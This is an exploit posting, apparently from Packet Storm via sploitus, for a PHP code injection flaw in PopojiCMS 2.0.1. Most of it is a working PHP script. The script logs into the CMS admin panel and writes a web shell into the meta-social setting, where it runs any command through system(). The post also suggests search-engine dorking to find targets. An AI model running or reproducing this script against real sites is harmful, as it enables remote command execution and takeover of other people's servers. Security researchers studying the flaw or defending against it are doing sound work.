Share
## https://sploitus.com/exploit?id=PACKETSTORM:215641
=============================================================================================================================================
    | # Title     : PopojiCMS 2.0.1 PHP COde Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip                                                         |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Exploiting the Web Execution Vulnerability in PopojiCMS
    
       (Related : https://packetstorm.news/files/id/178630/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php exploit.php sitename username password
    
    [+] PayLoad :
    
    <?php
    
    function exploit($url, $username, $password) {
        $login_url = "{$url}/po-admin/route.php?mod=login&act=proclogin";
        $login_data = array("username" => $username, "password" => $password);
        $headers = array(
            "Content-Type: application/x-www-form-urlencoded",
            "Referer: {$url}/po-admin/index.php"
        );
    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $login_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $login_response = curl_exec($ch);
    
        if (strpos($login_response, "Administrator PopojiCMS") !== false) {
            echo "Login Successful!\n";
            sleep(1); // 1 second wait
        } else {
            echo "Login Failed!\n";
            return;
        }
    
        $edit_url = "{$url}/po-admin/route.php?mod=setting&act=metasocial";
        $edit_data = array(
            "meta_content" => "<html>
    <body>
    <form method=\"GET\" name=\"<?php echo basename(\$_SERVER['PHP_SELF']); ?>\">
    <input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">
    <input type=\"SUBMIT\" value=\"Execute\">
    </form>
    <pre>
    <?php
    if(isset(\$_GET['cmd']))
    {
        system(\$_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>"
        );
    
        curl_setopt($ch, CURLOPT_URL, $edit_url);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($edit_data));
        $edit_response = curl_exec($ch);
    
        if (strpos($edit_response, "cmd") !== false) {
            echo "Your shell is ready: {$url}\n";
            sleep(1);
        } else {
            echo "Exploit Failed!\n";
            return;
        }
    
        curl_close($ch);
    }
    
    if ($argc != 4) {
        echo "Usage: php exploit.php sitename username password\n";
        exit(1);
    }
    
    $url = $argv[1];
    $username = $argv[2];
    $password = $argv[3];
    
    echo "Exploiting...\n";
    sleep(1);
    echo "Logging in...\n";
    sleep(1);
    exploit($url, $username, $password);
    
    ?>
    
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================